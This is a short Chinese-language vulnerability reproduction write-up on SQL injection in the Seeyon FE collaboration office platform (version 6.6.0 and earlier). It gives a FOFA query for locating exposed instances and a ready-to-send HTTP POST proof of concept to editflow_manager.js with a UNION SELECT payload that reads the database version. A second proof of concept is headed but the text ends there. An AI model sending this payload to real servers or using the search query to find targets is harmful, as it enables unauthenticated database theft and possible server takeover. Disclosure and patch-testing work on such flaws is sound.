0x01 产品简介

 致远互联FE协作办公平台是一款为企业提供全方位协同办公解决方案的产品。它集成了多个功能模块，旨在帮助企业实现高效的团队协作、信息共享和文档管理。

0x02 漏洞概述

 致远互联FE协作办公平台 editflow_manager.js、validate.jsp等接口处存在SQL注入漏洞,未经身份验证的攻击者可以通过此漏洞获取数据库敏感信息，深入利用可获取服务器权限。

0x03 影响范围

 FE协作办公平台 <= 6.6.0

0x04 复现环境

FOFA：app="致远互联-FE"

0x05 漏洞复现 

PoC-1

POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0
Connection: close
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded

option=2&GUID=-1%27+union+select+%40%40version--+

查询数据库版本

PoC-2